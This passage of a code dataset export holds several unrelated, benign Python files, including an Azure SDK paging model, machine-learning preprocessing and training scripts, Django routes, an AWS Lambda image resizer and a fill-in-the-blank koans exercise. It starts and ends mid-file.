P2SVpnGatewayPaged(Paged):\n \"\"\"\n A paging container for iterating over a list of :class:`P2SVpnGateway ` object\n \"\"\"\n\n _attribute_map = {\n 'next_link': {'key': 'nextLink', 'type': 'str'},\n 'current_page': {'key': 'value', 'type': '[P2SVpnGateway]'}\n }\n\n def __init__(self, *args, **kwargs):\n\n super(P2SVpnGatewayPaged, self).__init__(*args, **kwargs)\nclass VirtualHubRouteTableV2Paged(Paged):\n \"\"\"\n A paging container for iterating over a list of :class:`VirtualHubRouteTableV2 ` object\n \"\"\"\n\n _attribute_map = {\n 'next_link': {'key': 'nextLink', 'type': 'str'},\n 'current_page': {'key': 'value', 'type': '[VirtualHubRouteTableV2]'}\n }\n\n def __init__(self, *args, **kwargs):\n\n super(VirtualHubRouteTableV2Paged, self).__init__(*args, **kwargs)\nclass WebApplicationFirewallPolicyPaged(Paged):\n \"\"\"\n A paging container for iterating over a list of 
:class:`WebApplicationFirewallPolicy ` object\n \"\"\"\n\n _attribute_map = {\n 'next_link': {'key': 'nextLink', 'type': 'str'},\n 'current_page': {'key': 'value', 'type': '[WebApplicationFirewallPolicy]'}\n }\n\n def __init__(self, *args, **kwargs):\n\n super(WebApplicationFirewallPolicyPaged, self).__init__(*args, **kwargs)\n","sub_path":"src/connection-monitor-preview/azext_connection_monitor_preview/vendored_sdks/v2019_11_01/v2019_11_01/models/_paged_models.py","file_name":"_paged_models.py","file_ext":"py","file_size_in_byte":38773,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"553908610","text":"'''\nCalculates MapperSpll heuristic\nChecks for ratio of SPILLED_RECORDS/MAP_OUTPUT_RECORDS\n'''\nfrom main import *\n\ndef MapperSpill(i):\t\n\theuristic = heuristic_class()\n\tthresh_val = getattr(heuristic,map_threshold)\n\tval = getattr(heuristic,map_value)\n\tinsert= getattr(heuristic,insert_data)\n\t\n\tspill_threshold = float(thresh_val(i,\"SPILLED_RECORDS\"))\n\tmapoutput_threshold = float(thresh_val(i,\"MAP_OUTPUT_RECORDS\"))\n\tspill_record = val(i,\"SPILLED_RECORDS\")\n\tmapoutput= val(i,\"MAP_OUTPUT_RECORDS\")\n\n\t\n\tif mapoutput==0 and mapoutput_threshold==0:\n\t\tratio=0\n\t\tratio_thres=0\n\telif mapoutput!=0 and mapoutput_threshold==0:\n\t\tratio_thres=0\n\t\tratio=spill_record/mapoutput\n\telif mapoutput==0 and mapoutput_threshold!=0:\t\n\t\tratio = 0\n\t\tratio_thres = spill_threshold/mapoutput_threshold\n\telse:\n\t\tratio=spill_record/mapoutput\n\t\tratio_thres = spill_threshold/mapoutput_threshold\n\t\n\tpercent = 0.02*ratio_thres\n\tif ratio_thres-percent <= ratio <= ratio_thres+percent:\n\t\tseverity=\"LOW\"\n\t\tscore=ratio\n\telse:\n\t\tseverity = \"HIGH\"\n\t\tscore=ratio\n\t\n\tinsert(i,score,severity,\"MapperSpill\")\n\tprint (severity,score,i[0],\"MapperSpill\")\n","sub_path":"heuristics/MapperSpill.py","file_name":"MapperSpill.py","file_ext":"py","file_size_in_byte":1111,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"650109687","text":"# ---\n# jupyter:\n# jupytext:\n# formats: ipynb,py:light\n# text_representation:\n# extension: .py\n# format_name: light\n# format_version: '1.5'\n# jupytext_version: 1.3.2\n# kernelspec:\n# display_name: Python 3\n# language: python\n# name: python3\n# ---\n\n# +\nimport pandas as pd\nimport numpy as np\n\nimport sys\nsys.path\n\nsys.path.insert(0, '../classes_functions')\n\nfrom data_processing_class import DataProcessing\n\n# +\n# Train-test-split\ndf_tran = pd.read_csv(\"../data/original_data/train_transaction.csv\", index_col = 'TransactionID')\ndf_id = pd.read_csv(\"../data/original_data/train_identity.csv\", index_col = 'TransactionID')\n\ndf_tot = df_tran.merge(df_id, how = 'left', left_on='TransactionID', right_on='TransactionID')\ndf_train_split = pd.read_csv(\"../data/processed_data/df_train_split.csv\")\ndf_test_split = pd.read_csv(\"../data/processed_data/df_test_split.csv\")\ndf_train_split_pp = DataProcessing(df_train_split, 'isFraud')\ndf_train_split_pp.threshold_col_del(0.25)\n\ndf_train_split_pp.extract_timestamps()\n\nnumerical_cols = []\ncategorical_cols = []\n\nfor col in df_train_split_pp.X.columns:\n if df_train_split_pp.X[col].dtype != 'object':\n numerical_cols.append(col)\n else:\n categorical_cols.append(col)\ndf_train_split_pp.lblencoder()\ndf_train_split_pp.fill_null(categorical_cols, 'mode')\ndf_train_split_pp.fill_null(numerical_cols, 
'median')\n\ndf_train_split_pp.balancesample(\"over\")\ndf_train_split_pp.standardiser()\ndf_train_split_pp.pca_reduction(0.95)\ndf_train_split_pp.X.head()\ndf_train_split_ppc = pd.concat([df_train_split_pp.X, df_train_split_pp.y], axis=1, sort=False)\ndf_train_split_ppc.to_csv(\"../data/processed_data/df_train_split_ppc.csv\", index=False)\n\ndf_test_split_pp = DataProcessing(df_test_split, 'isFraud')\ndf_test_split_pp.threshold_col_del(0.25)\ndf_test_split_pp.extract_timestamps()\n\nnumerical_cols = []\ncategorical_cols = []\n\nfor col in df_test_split_pp.X.columns:\n if df_test_split_pp.X[col].dtype != 'object':\n numerical_cols.append(col)\n else:\n categorical_cols.append(col)\ndf_test_split_pp.lblencoder()\ndf_test_split_pp.fill_null(categorical_cols, 'mode')\ndf_test_split_pp.fill_null(numerical_cols, 'median')\ndf_test_split_pp.standardiser()\n\ndf_test_split_pp.X.head()\ndf_test_split_ppc = pd.concat([df_test_split_pp.X, df_test_split_pp.y], axis=1, sort=False)\ndf_test_split_ppc.to_csv(\"../data/processed_data/df_test_split_ppc.csv\", index=False)\n\n# -\n\n\n","sub_path":"code/0100_clean_dataset.py","file_name":"0100_clean_dataset.py","file_ext":"py","file_size_in_byte":2468,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"300039498","text":"import json\nimport os\nfrom pathlib import Path\nfrom string import Template\n\n\ndef get_default_config():\n base_path = Path(__file__).parent.parent\n return base_path / \"configs\" / \"basic.json\"\n\n\ndef get_config(path):\n with open(path) as stream:\n template = Template(stream.read())\n\n try:\n source = template.substitute(os.environ)\n except KeyError as key_error:\n [key] = key_error.args\n raise ValueError(f\"Missing configuration value: {key}\") from key_error\n else:\n return json.loads(source)\n\n\nconfig = get_config(os.getenv(\"DVC_BENCH_CONFIG\", get_default_config()))\n","sub_path":"benchmarks/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":616,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"63064353","text":"import unittest\n#fungsi\nclass Nyapa(unittest.TestCase):\n \n def __init__(self, nama):\n self.nama = nama\n\n self.assertIs(self.nama, 'John') #asserIs untuk String, .assertIs(a, b)\n\n print('Hallo, '+ self.nama)\n #print(\"Hallo, \" + nama) #print(\"Hallo, \", nama) <-- kedetek sebagai array...
jadi nanti hasilnya ada kurung & tanda petik\n\n\n#f_hello('kobra') .assertIs(a, b)\n\nsapa1 = Nyapa('John')\n\nif __name__ == \"__main__\":\n unittest.main()","sub_path":"novice/02-02/kasus/kasus1.py","file_name":"kasus1.py","file_ext":"py","file_size_in_byte":477,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"70146052","text":"from gensim.models import word2vec\nimport numpy as np\nimport sklearn.decomposition\nimport pandas as pd\nimport sys\n\nif __name__ == \"__main__\":\n\n\tword, n = sys.argv[1], int(sys.argv[2])\n\n\tmodel = word2vec.Word2Vec.load(\"./model_500_5.model\")\n\tsimilar_words = model.most_similar(positive=[word], topn = n)\n\n\tdata,words, sim = np.zeros((n, 500)),[],[]\n\n\ti=0\n\tfor word, similarity in similar_words:\n\t\twords.append(word)\n\t\tsim.append(similarity)\n\t\tdata[i] = model[word]\n\t\ti+=1\n\n\tdim = 2\n\tpca = sklearn.decomposition.PCA(dim)\n\n\tresult = pca.fit_transform(data)\n\n\tdf = pd.DataFrame({\"第1主成分\":result[:,0],\"第2主成分\":result[:,1],\"similarity\":sim}, index=words)\n\n\tprint(df)\n\n\tdf.to_csv(\"./d.csv\")\n\n\n\n","sub_path":"word2vec/make2dim.py","file_name":"make2dim.py","file_ext":"py","file_size_in_byte":706,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"75297325","text":"\nfrom functools import partial\nimport logging\n\nfrom ..common import Handler\n\n\nclass AGISession(object):\n\n proto = None\n logger = logging.getLogger(__name__)\n\n def session_established(self):\n \"\"\"\n Called when the AGI session is established.\n \"\"\"\n\n def session_finished(self):\n \"\"\"\n Called when the AGI session is torn down.\n \"\"\"\n\n def run_coroutine(self, gen):\n handler = next(gen)\n self._bind_coroutine_handler(gen, handler)\n\n def _bind_coroutine_handler(self, gen, handler):\n if not isinstance(handler, Handler):\n raise TypeError(handler.__class__)\n handler.on_result = partial(self._on_coroutine_result, gen, True)\n handler.on_exception = partial(self._on_coroutine_result, gen, False)\n\n def _on_coroutine_result(self, gen, is_success, result):\n try:\n if is_success:\n handler = gen.send(result)\n else:\n handler = gen.throw(result)\n except StopIteration:\n gen.close()\n else:\n self._bind_coroutine_handler(gen, handler)\n","sub_path":"obelus/agi/session.py","file_name":"session.py","file_ext":"py","file_size_in_byte":1124,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"577399920","text":"#!c:\\Program Files (x86)\\Python33\\python.exe -tt\n\nimport sys\nimport random\nimport time\n\ndef main():\n\tif len(sys.argv) < 3:\n\t\tprint('Usage: randgen.py num filename')\n\t\tsys.exit(1)\n\n\tloopend = int(sys.argv[1])\n\tlow = 999999\n\thigh = 10000000\n\trandlist = []\n\t\n\tst = time.time()\n\tprint('Start time: ', st)\n\n\ti = 0\n\twhile i < loopend:\n\t\tm = random.randrange(low, high)\n\t\tif m != 0:\n\t\t\trandlist.append(m)\n\t\ti = i + 1\n\n\tet1 = time.time()\n\tprint('End time1 (Gen', loopend, 'random data): ', et1, end = ';\\t')\n\tprint('Durtime: ', (et1 -st))\n\n\tfile = open(sys.argv[2], 'w')\n\n\ti = 0\n\twhile i < len(randlist):\n\t\tfile.write(str(randlist[i]))\n\t\tfile.write(';')\n\t\ti = i + 1\n\n\tfile.close()\n\n\tet2 = time.time()\n\tprint('End time2 (Write', loopend, 'random data into file): ', et2, end = ';\\t')\n\tprint('Durtime: ', (et2 -et1))\n\n\treturn\n\nif __name__ == '__main__':\n 
main()\n","sub_path":"fromPythonTur/sorting/randgen.py","file_name":"randgen.py","file_ext":"py","file_size_in_byte":855,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"493786614","text":"import os\nimport sys\nimport time\nimport nltk\nimport pickle\nimport numpy as np\nimport pandas as pd\nfrom contextlib import contextmanager\nfrom gensim.models import word2vec, KeyedVectors, FastText\nfrom keras.preprocessing.text import text_to_word_sequence\n\nsys.path.append(\"../input/toxic-src\")\nfrom logger import setup_logger, LOGGER\n\n\n# ===============\n# Constants\n# ===============\nSAVE_DIR = \"./\"\nDATA_DIR = \"../input/jigsaw-unintended-bias-in-toxicity-classification\"\nLOGGER_PATH = os.path.join(SAVE_DIR, \"log.txt\")\nTRAIN_PATH = os.path.join(DATA_DIR, \"train.csv\")\nTEST_PATH = os.path.join(DATA_DIR, \"test.csv\")\nSUB_PATH = os.path.join(DATA_DIR, \"sample_submission.csv\")\nFASTTEXT_PATH = '../input/fasttext-crawl-300d-2m/crawl-300d-2M.vec'\nGLOVE_PATH = '../input/glove.840B.300d.pkl'\nps = nltk.stem.PorterStemmer()\nlc = nltk.stem.lancaster.LancasterStemmer()\nsb = nltk.stem.snowball.SnowballStemmer('english')\n\n\n# ===============\n# Settings\n# ===============\nw2v_params = {\n \"size\": 300,\n \"iter\": 5,\n \"seed\": 0,\n \"min_count\": 1,\n \"workers\": 1\n}\nsave_path = \"exp5_fasttext_finetune_nopreprocess\"\nsetup_logger(out_file=LOGGER_PATH)\n\n\n@contextmanager\ndef timer(name):\n t0 = time.time()\n yield\n LOGGER.info(f'[{name}] done in {time.time() - t0:.0f} s')\n\n\ndef get_coefs(word, *arr): return word, np.asarray(arr, dtype='float32')\n\n\ndef load_embeddings(embed_dir):\n embedding_index = dict(get_coefs(*o.strip().split(\" \")) for o in open(embed_dir, encoding=\"utf8\"))\n return embedding_index\n\ndef load_embeddings_pickle(embed_dir):\n with open(embed_dir, 'rb') as f:\n embedding_index = pickle.load(f)\n return embedding_index\n\n\ndef load_embedding(embeddings_index, model, embedding_dim=300):\n words = model.wv.index2entity\n\n embedding_matrix = np.zeros((len(words), embedding_dim))\n\n for i, word in enumerate(words):\n if word in embeddings_index:\n embedding_matrix[i] = embeddings_index[word]\n continue\n word_ = word.upper()\n if word_ in embeddings_index:\n embedding_matrix[i] = embeddings_index[word_]\n continue\n word_ = word.capitalize()\n if word_ in embeddings_index:\n embedding_matrix[i] = embeddings_index[word_]\n continue\n word_ = ps.stem(word)\n if word_ in embeddings_index:\n embedding_matrix[i] = embeddings_index[word_]\n continue\n word_ = lc.stem(word)\n if word_ in embeddings_index:\n embedding_matrix[i] = embeddings_index[word_]\n continue\n word_ = sb.stem(word)\n if word_ in embeddings_index:\n embedding_matrix[i] = embeddings_index[word_]\n continue\n try:\n embedding_matrix[i] = embeddings_index[\"unkown\"]\n except:\n continue\n\n return embedding_matrix\n\n\ndef train_w2v(train_text, w2v_params, save_path, embeddings_indexes):\n train_corpus = [text_to_word_sequence(text) for text in train_text]\n\n model = FastText(**w2v_params)\n model.build_vocab(train_corpus)\n\n embedding_matrix = [load_embedding(embeddings_index, model) for embeddings_index in embeddings_indexes]\n embedding_matrix = np.mean(embedding_matrix, axis=0)\n model.wv.vectors[:] = embedding_matrix\n model.trainables.syn1neg[:] = embedding_matrix\n model.train(train_corpus, total_examples=len(train_corpus), epochs=model.epochs)\n model.save(\"{}.model\".format(save_path))\n\n dic = {}\n for word in 
model.wv.vocab:\n dic[word] = model.wv[word]\n with open(\"{}.pkl\".format(save_path), 'wb') as f:\n pickle.dump(dic, f)\n\n\nif __name__ == '__main__':\n train_df = pd.read_csv(TRAIN_PATH)\n test_df = pd.read_csv(TEST_PATH)\n train_df = train_df.append(test_df).reset_index(drop=True)\n\n with timer('train embeddings'):\n fasttext_index = load_embeddings(FASTTEXT_PATH)\n glove_index = load_embeddings_pickle(GLOVE_PATH)\n embeddings_indexes = [fasttext_index, glove_index]\n train_w2v(train_df['comment_text'], w2v_params, save_path, embeddings_indexes)\n","sub_path":"code/self_embedding/exp5.py","file_name":"exp5.py","file_ext":"py","file_size_in_byte":4085,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"175527140","text":"import tensorflow as tf\n\naa = tf.constant([[2.0, 4], [3, 1]])\n\nbb = tf.expand_dims(aa, 2)\n\nconfig = tf.ConfigProto()\nconfig.gpu_options.allow_growth = True\nsess = tf.Session(config=config)\nprint(sess.run(bb))","sub_path":"test/array_ops/expand_dims.py","file_name":"expand_dims.py","file_ext":"py","file_size_in_byte":208,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"619189342","text":"import datetime\n\nclass Group(object):\n def __init__(self, id: int, name: str, order: int, color: str):\n self.id = int(id)\n self.name = name\n self.order = int(order)\n self.color = color\n \n def toJson(self):\n return {\n 'id': self.id,\n 'name': self.name,\n 'order': self.order,\n 'color': self.color\n }\n \n @staticmethod\n def toJsonSet(groups):\n sets = []\n for note in groups:\n sets.append(note.toJson())\n return sets","sub_path":"app/Modules/Note/Models/Group.py","file_name":"Group.py","file_ext":"py","file_size_in_byte":547,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"106805942","text":"import tensorflow as tf\nfrom tensorflow import keras\nfrom tensorflow.keras import datasets, layers, optimizers, Sequential, metrics\nimport os\n\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'\n\n\n# 预处理函数\ndef preprocess(x, y):\n x = tf.cast(x, dtype=tf.float32)/255.\n y = tf.cast(y, dtype=tf.int32)\n return x, y\n\n\n# 获取fashionMnist数据集内容\n(x, y), (x_test, y_test) = datasets.fashion_mnist.load_data()\nprint(x.shape, y.shape)\n\nbatchsz = 128\n# 构造数据集\ndb = tf.data.Dataset.from_tensor_slices((x, y))\ndb = db.map(preprocess).shuffle(10000).batch(batchsz)\ndb_test = tf.data.Dataset.from_tensor_slices((x_test, y_test))\ndb_test = db_test.map(preprocess).batch(batchsz)\n\ndb_iter = iter(db)\nsample = next(db_iter)\nprint('batch:', sample[0].shape, sample[1].shape)\n\n# 新建一个网络 Sequential可以理解为一个容器\nmodel = Sequential([\n # 第一层为全连接层 [b, 784] => [b, 256]\n layers.Dense(256, activation=tf.nn.relu),\n # 第二层为全连接层 [b, 256] => [b, 128]\n layers.Dense(128, activation=tf.nn.relu),\n # 第三层为全连接层 [b, 128] => [b, 64]\n layers.Dense(64, activation=tf.nn.relu),\n # 第四层为全连接层 [b, 64] => [b, 32]\n layers.Dense(32, activation=tf.nn.relu),\n # 第五层为全连接层 [b, 32] => [b, 10]\n layers.Dense(10)\n])\n# 设置输入维度\nmodel.build(input_shape=[None, 28*28])\nmodel.summary()\n\n# 使用优化器\n# w = w - lr*grad\noptimizer = optimizers.Adam(lr=1e-3)\n\n\ndef main():\n\n for epoch in range(30):\n\n # 每一个epoch完成数据集的迭代\n for step, (x, y) in enumerate(db):\n\n # x:[b, 28, 28]\n # y:[b]\n x = tf.reshape(x, [-1, 28*28])\n # 求梯度的信息\n with tf.GradientTape() as tape:\n # 前向传播 [b, 784] => [b, 10]\n logits = model(x)\n # 对y值进行onehot encoding\n y_onehot = tf.one_hot(y, 
depth=10)\n # 均方差的计算 [b]\n loss_mse = tf.reduce_mean(tf.losses.MSE(y_onehot, logits))\n loss_ce = tf.losses.categorical_crossentropy(y_onehot, logits, from_logits=True) # 为了结果稳定,后面的参数需要设置\n loss_ce = tf.reduce_mean(loss_ce)\n\n # model.trainable_variables 可以返回一个w1,w2,w3...的列表,不需要人为整理\n grads = tape.gradient(loss_ce, model.trainable_variables)\n optimizer.apply_gradients(zip(grads, model.trainable_variables)) # zip是将grads和model....中的元素拼接在一起\n\n if step % 100 == 0:\n print(epoch, step, 'loss:', float(loss_ce), float(loss_mse))\n\n # test\n total_correct = 0\n total_num = 0\n for x, y in db_test:\n\n # x:[b, 28, 28]\n # y:[b]\n x = tf.reshape(x, [-1, 28*28])\n # [b, 10]\n logits = model(x)\n # logits => prob, [b, 10]\n prob = tf.nn.softmax(logits, axis=1)\n # [b, 10] => [b], int64\n pred = tf.argmax(prob, axis=1)\n pred = tf.cast(pred, dtype=tf.int32)\n # pred:[b]\n # y: [b]\n correct = tf.equal(pred, y)\n correct = tf.reduce_sum(tf.cast(correct, dtype=tf.int32))\n\n total_correct += int(correct)\n total_num += x.shape[0]\n\n acc = total_correct / total_num\n print(epoch, 'test acc: ', acc)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"fashionMnist_Test01.py","file_name":"fashionMnist_Test01.py","file_ext":"py","file_size_in_byte":3513,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"68655508","text":"from django.conf.urls import url\nfrom management import views\n\nurlpatterns = [\n url(r'^$', views.index, name='homepage'),\n url(r'^signup/$', views.signup, name='signup'),\n url(r'^login/$', views.login, name='login'),\n url(r'^logout/$', views.logout, name='logout'),\n url(r'^set_password/$', views.set_password, name='set_password'),\n url(r'^add_book/$', views.add_book, name='add_book'),\n url(r'^add_computer/$', views.add_computer, name='add_computer'),\n url(r'^add_server/$', views.add_server, name='add_server'),\n url(r'^add_sparepart/$', views.add_spart, name='add_spart'),\n url(r'^add_idcinfo/$', views.add_idcinfo, name='add_idcinfo'),\n url(r'^add_img/$', views.add_img, name='add_img'),\n url(r'^add_user/$', views.signup, name='signup'),\n url(r'^view_book_list/$', views.view_book_list, name='view_book_list'),\n url(r'^view_computer_list/$', views.view_computer_list, name='view_computer_list'),\n url(r'^view_server_list/$', views.view_server_list, name='view_server_list'),\n url(r'^view_sparepart_list/$', views.view_spart_list, name='view_spart_list'),\n url(r'^view_idcinfo_list/$', views.view_idcinfo_list, name='view_idcinfo_list'),\n #url(r'^view_book/detail/$', views.detail, name='detail'),\n url(r'^cpudetail/', views.cpudetail, name='detail'),\n url(r'^serverdetail/', views.serverdetail, name='serverdetail'),\n url(r'^sparepartdetail/', views.spartdetail, name='spartdetail'),\n url(r'^modify_computer/', views.modify_computer, name='modify_computer'),\n url(r'^modify_server/', views.modify_server, name='modify_server'),\n url(r'^modify_sparepart/', views.modify_spart, name='modify_spart'),\n url(r'^up_idcinfo/', views.up_idcinfo, name='up_idcinfo'),\n url(r'^modify_idcinfo/', views.modify_idcinfo, name='modify_idcinfo'),\n url(r'^up_computer/', views.up_computer, name='up_computer'),\n url(r'^up_server/', views.up_server, name='up_server'),\n url(r'^up_spart/', views.up_spart, name='up_spart'),\n url(r'^delete_computer/', views.del_computer, name='del_computer'),\n url(r'^delete_server/', views.del_server, name='del_server'),\n url(r'^delete_sparepart/', views.del_spart, name='del_spart'),\n 
url(r'^delete_idcinfo/', views.del_idcinfo, name='del_idcinfo'),\n]\n","sub_path":"management/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2274,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"627144808","text":"# to parse the url - s3 filename\n#import urllib.parse\n\n# os library\nimport os\n# create unique IDs \nimport uuid\n\n# import Image module from Pillow\nfrom PIL import Image \n\n# AWS SDK for python\nimport boto3\n\n# initialize the S3 object\ns3 = boto3.client('s3')\n \n\nprint('Loading image resize lambda function')\n\n\ndef resize_image(image_path, resized_path):\n with Image.open(image_path) as image:\n image.thumbnail((128, 128))\n image.save(resized_path)\n \n\ndef lambda_handler(event, context):\n # Let us print the event so that we can see how it looks \n print(event)\n \n # Get the triggering bucket name from the event \n bucket = event['Records'][0]['s3']['bucket']['name']\n print(bucket)\n\n #Get the file/key name from the event\n key = event['Records'][0]['s3']['object']['key']\n #key = urllib.parse.unquote_plus(event['Records'][0]['s3']['object']['key'], encoding='utf-8')\n print('input filename that is to be processed is = ', key)\n \n # save the file in /tmp directory -- lambda provide /tmp directory for storage during the execution of function\n temp_save_path = '/tmp/{}{}'.format(uuid.uuid4(), key)\n print('temp_save_path ', temp_save_path)\n \n # create a resized filename \n temp_resize_path = '/tmp/resized-{}'.format(key)\n print('resized filename ', temp_resize_path)\n \n # Now dowload the file from s3 to /tmp directory\n s3.download_file(bucket, key, temp_save_path)\n print('Dirs in /tmp ', os.listdir('/tmp/'))\n \n # resize the image -- create image thumbnail\n resize_image(temp_save_path, temp_resize_path)\n print('Dirs in /tmp ', os.listdir('/tmp/'))\n\n # upload resized image to destination bucket\n dest_bucket = '{}-resized'.format(bucket)\n s3.upload_file(temp_resize_path,dest_bucket , key)\n \n print('Done with uploading file to dest bucket ', dest_bucket)","sub_path":"image-resizer-aws-lambda/lambda_function.py","file_name":"lambda_function.py","file_ext":"py","file_size_in_byte":1875,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"526743515","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport json\nimport os\nimport re\nfrom collections import OrderedDict, Counter\nfrom functools import lru_cache\n\nfrom runner.koan import *\n\n# To run this koans we have to install several libraries\n# pip install lxml\nfrom lxml import html\n# pip install requests\nimport requests\n\n# pip install approvaltests\nfrom approvaltests.Approvals import verify\nfrom approvaltests.GenericDiffReporter import GenericDiffReporter\n\n\n# this is approval test verification code based on git diff\ndef diff_verify(result):\n json_result = json.dumps(result, indent=4, separators=(',', ': '))\n diff_path = 'C:/Program Files/Git/usr/bin/diff.exe' if os.name == 'nt' else '/usr/bin/diff'\n verify(json_result, GenericDiffReporter(('Custom', diff_path)))\n\n# link to script draft of Star Wars: a new hope\nURL = \"http://www.imsdb.com/scripts/Star-Wars-A-New-Hope.html\"\n\n\nclass AboutStarWars(Koan):\n \"\"\" Explore draft of Star Wars: a new hope using regex and XPath \"\"\"\n\n # loading page with script from internet\n @staticmethod\n @lru_cache(maxsize=None)\n def load_html_script_of_a_movie():\n # let's do HTTP GET with request 
library\n response = _____.___(URL)\n\n # what is expected HTTP OK status code\n # take a look here https://en.wikipedia.org/wiki/List_of_HTTP_status_codes\n if response.status_code == ___:\n return response.text\n else:\n assert False, \"can't load script from IMDB\"\n\n def test_perform_http_method_get_to_load_html(self):\n raw_html = AboutStarWars.load_html_script_of_a_movie()\n\n # now we have whole HTML page loaded, let verify it\n self.assertIsNotNone(raw_html)\n self.assertEqual(len(raw_html), _____)\n\n @staticmethod\n def load_raw_line_by_line_script_of_a_movie():\n tree = html.fromstring(AboutStarWars.load_html_script_of_a_movie())\n\n # you could yse browser's developers tools to find script\n # here is an example http://pasteboard.co/AWrJYwQho.png\n #\n # here is explanation how to test XPath expressions with Google Chrome\n # http://yizeng.me/2014/03/23/evaluate-and-validate-xpath-css-selectors-in-chrome-developer-tools/\n # same with Firefox\n # https://developer.mozilla.org/en-US/docs/Tools/Web_Console/Helpers\n #\n # here you need to select *all text* within
 ... 
\n movie_script = tree.xpath(_____)\n\n return movie_script\n\n def test_extracting_raw_script_from_html(self):\n movie_script = AboutStarWars.load_raw_line_by_line_script_of_a_movie()\n\n # lets check number of lines and content\n self.assertEqual(len(movie_script), ____)\n diff_verify(movie_script)\n\n scene_name_regex = r'_____'\n role_name_regex = r'______'\n\n def test_extracting_all_scenes_from_html_using_re(self):\n movie_script = AboutStarWars.load_raw_line_by_line_script_of_a_movie()\n diff_verify(self.extracting_all_scenes_and_roles(movie_script, self.scene_name_regex, self.role_name_regex))\n\n @staticmethod\n def load_b_tags_only_line_by_line():\n tree = html.fromstring(AboutStarWars.load_html_script_of_a_movie())\n\n # could we simplify calculations by extracting only text from within ... tags?\n movie_script = tree.xpath(_____)\n\n return movie_script\n\n def test_extracting_names_from_html_using_xpath(self):\n b_tags_texts = AboutStarWars.load_b_tags_only_line_by_line()\n diff_verify(self.extracting_all_scenes_and_roles(b_tags_texts, self.scene_name_regex))\n\n def test_difference_between_two_results(self):\n movie_script = AboutStarWars.load_raw_line_by_line_script_of_a_movie()\n b_tags_texts = AboutStarWars.load_b_tags_only_line_by_line()\n\n re_results = self.extracting_all_scenes_and_roles(movie_script, self.scene_name_regex, self.role_name_regex)\n xpath_results = self.extracting_all_scenes_and_roles(b_tags_texts, self.scene_name_regex)\n\n # there should not be any difference between to results\n self.assertSetEqual(set(xpath_results) ^ set(re_results), set())\n\n def test_who_are_three_main_roles_by_number_of_phrases(self):\n movie_script = AboutStarWars.load_raw_line_by_line_script_of_a_movie()\n re_results = self.extracting_all_scenes_and_roles(movie_script, self.scene_name_regex, self.role_name_regex)\n\n top = Counter()\n\n for roles in re_results.values():\n top += Counter(roles)\n\n diff_verify(top.most_common(n=3))\n\n def test_there_are_important_characters_that_never_speak(self):\n \"\"\"\n here is homework *extra* challenge:\n there are important characters, but they never speak?\n who are they?\n \"\"\"\n\n role_names = __\n\n self.assertSetEqual(role_names, {__})\n\n @staticmethod\n def extracting_all_scenes_and_roles(movie_script, scene_name_regex, role_name_regex=r\".+\"):\n # I'd like to preserve chronological order of scenes and roles in scenes\n scenes = OrderedDict()\n\n current_scene_name = None\n\n scene_name_re = re.compile(scene_name_regex)\n role_name_re = re.compile(role_name_regex)\n\n for line in movie_script:\n line = line.strip()\n if scene_name_re.match(line):\n current_scene_name = line\n elif current_scene_name and role_name_re.match(line):\n role_name = line\n scene_counter = scenes.get(current_scene_name, OrderedDict())\n scene_counter[role_name] = scene_counter.get(role_name, 0) + 1\n scenes[current_scene_name] = scene_counter\n else:\n pass\n\n return scenes\n","sub_path":"python3/koans/about_starwars.py","file_name":"about_starwars.py","file_ext":"py","file_size_in_byte":5769,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"307746515","text":"#!/usr/bin/env python\n\nfrom time import sleep\nfrom Adafruit_CharLCDPlate import Adafruit_CharLCDPlate\nfrom CharLCDScroll import Scroller\n\nclass CharLCD(Adafruit_CharLCDPlate):\n\t\t\n\tdef __init__(self, playermedia, playeroptions):\n\t\tAdafruit_CharLCDPlate.__init__(self)\n\t\tself._playermedia = 
playermedia\n\t\tself._playeroptions = playeroptions\n\t\tself._isPlayermediaFocus = True\n\n\t\tself._light = True\n\t\tself._colorIndex = 0\n\t\tself._colors = (('RED', self.RED), ('YELLOW', self.YELLOW), ('GREEN', self.GREEN), \\\n\t\t\t('TEAL', self.TEAL), ('BLUE', self.BLUE), ('VIOLET', self.VIOLET), \\\n\t\t\t('OFF', self.OFF), ('ON', self.ON))\n\n\t\t# map button with function\n\t\tself._buttons = (('SELECT', self.SELECT, self.button_select), ('UP', self.UP, self.button_up), \\\n\t\t\t('DOWN', self.DOWN, self.button_down), ('LEFT', self.LEFT, self.button_left), \\\n\t\t\t('RIGHT', self.RIGHT, self.button_right))\n\t\tself._buttonsFunction = playermedia.getActionButtons()\n\n\t\t# display lcd\n\t\tself._line1 = \"\"\n\t\tself._line2 = \"\"\n\t\tself._scroller = None\n\t\tself._sleeptimer = 50\n\t\tself.turn_on()\n\t\tself.update()\n\n\n\t# get push button call\n\tdef action_button(self):\n\t\tfor button in self._buttons:\n\t\t\tif 